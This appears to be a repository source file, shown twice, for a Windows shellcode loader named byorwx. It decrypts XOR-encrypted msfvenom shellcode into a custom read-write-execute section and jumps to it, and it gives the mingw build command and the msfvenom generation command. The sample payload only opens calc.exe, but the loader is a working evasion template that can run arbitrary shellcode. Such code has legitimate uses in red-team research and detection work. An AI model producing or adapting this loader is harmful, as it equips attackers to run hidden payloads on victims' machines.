dadevel/byorwx.cpp

## byorwx.cpp
#include <cstdint>

// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe

// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
unsigned char buf[] =
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"
"\xa2\xad\x68\x27\x60\xa3\x81\x89\x37\x27\x30\x2a\xe8\x36"
"\x45\xed\x23\x5e\x2b\x65\xb5\xed\xe1\xea\x63\x64\x65\x2e"
"\xe4\xa2\x17\x03\x2d\x67\xb1\x32\xe8\x2c\x7d\x22\xea\x22"
"\x43\x2d\x64\xb6\x82\x34\x2b\x9b\xac\x27\xea\x56\xeb\x2c"
"\x64\xb0\x2c\x53\xaa\x2c\x54\xa6\xcd\x23\xa2\xad\x68\x27"
"\x60\xa3\x5b\x84\x10\x97\x2d\x61\x2f\x40\x6d\x23\x58\xb3"
"\x16\xbc\x3d\x22\xea\x22\x47\x2d\x64\xb6\x07\x23\xe8\x68"
"\x2d\x22\xea\x22\x7f\x2d\x64\xb6\x20\xe9\x67\xec\x2d\x67"
"\xb1\x23\x3b\x25\x3d\x38\x38\x38\x22\x3c\x24\x3f\x20\x38"
"\x2b\xe7\x89\x46\x20\x30\x9c\x84\x3d\x27\x38\x38\x2b\xef"
"\x77\x8f\x36\x9d\x9c\x9b\x38\x2e\xdb\x63\x63\x64\x65\x66"
"\x61\x62\x63\x2c\xe8\xeb\x60\x63\x63\x64\x24\xdc\x50\xe9"
"\x0c\xe3\x9a\xb3\xda\x92\xd6\xc6\x33\x27\xdb\xc4\xf6\xd9"
"\xf8\x99\xb4\x2a\xe0\xa0\x4d\x5a\x67\x1e\x69\xe4\x9e\x86"
"\x14\x67\xd8\x23\x76\x14\x0e\x08\x63\x3d\x24\xef\xbb\x9d"
"\xb6\x07\x04\x0a\x02\x4c\x06\x1c\x00\x66";
unsigned char key[] = {'a','b','c','d','e','f'};

extern unsigned char PAYLOAD[];

int main() {
    __builtin_memcpy(PAYLOAD, buf, sizeof(buf));
    for (size_t i = 0; i < sizeof(buf); ++i) {
        PAYLOAD[i] = PAYLOAD[i] ^ key[i % sizeof(key)];
    }
    const auto exec_buf = reinterpret_cast<void (*)()>(PAYLOAD);
    exec_buf();
    return 0;
}

## section.S
    .section byorwx, "rwx"
    .global PAYLOAD
    .balign 1
PAYLOAD:
    .space PAYLOAD_SIZE
	#include <cstdint>

	// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe

	// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
	unsigned char buf[] =
	"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
	"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
	"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
	"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"
	"\xa2\xad\x68\x27\x60\xa3\x81\x89\x37\x27\x30\x2a\xe8\x36"
	"\x45\xed\x23\x5e\x2b\x65\xb5\xed\xe1\xea\x63\x64\x65\x2e"
	"\xe4\xa2\x17\x03\x2d\x67\xb1\x32\xe8\x2c\x7d\x22\xea\x22"
	"\x43\x2d\x64\xb6\x82\x34\x2b\x9b\xac\x27\xea\x56\xeb\x2c"
	"\x64\xb0\x2c\x53\xaa\x2c\x54\xa6\xcd\x23\xa2\xad\x68\x27"
	"\x60\xa3\x5b\x84\x10\x97\x2d\x61\x2f\x40\x6d\x23\x58\xb3"
	"\x16\xbc\x3d\x22\xea\x22\x47\x2d\x64\xb6\x07\x23\xe8\x68"
	"\x2d\x22\xea\x22\x7f\x2d\x64\xb6\x20\xe9\x67\xec\x2d\x67"
	"\xb1\x23\x3b\x25\x3d\x38\x38\x38\x22\x3c\x24\x3f\x20\x38"
	"\x2b\xe7\x89\x46\x20\x30\x9c\x84\x3d\x27\x38\x38\x2b\xef"
	"\x77\x8f\x36\x9d\x9c\x9b\x38\x2e\xdb\x63\x63\x64\x65\x66"
	"\x61\x62\x63\x2c\xe8\xeb\x60\x63\x63\x64\x24\xdc\x50\xe9"
	"\x0c\xe3\x9a\xb3\xda\x92\xd6\xc6\x33\x27\xdb\xc4\xf6\xd9"
	"\xf8\x99\xb4\x2a\xe0\xa0\x4d\x5a\x67\x1e\x69\xe4\x9e\x86"
	"\x14\x67\xd8\x23\x76\x14\x0e\x08\x63\x3d\x24\xef\xbb\x9d"
	"\xb6\x07\x04\x0a\x02\x4c\x06\x1c\x00\x66";
	unsigned char key[] = {'a','b','c','d','e','f'};

	extern unsigned char PAYLOAD[];

	int main() {
	__builtin_memcpy(PAYLOAD, buf, sizeof(buf));
	for (size_t i = 0; i < sizeof(buf); ++i) {
	PAYLOAD[i] = PAYLOAD[i] ^ key[i % sizeof(key)];
	}
	const auto exec_buf = reinterpret_cast<void (*)()>(PAYLOAD);
	exec_buf();
	return 0;
	}
	.section byorwx, "rwx"
	.global PAYLOAD
	.balign 1
	PAYLOAD:
	.space PAYLOAD_SIZE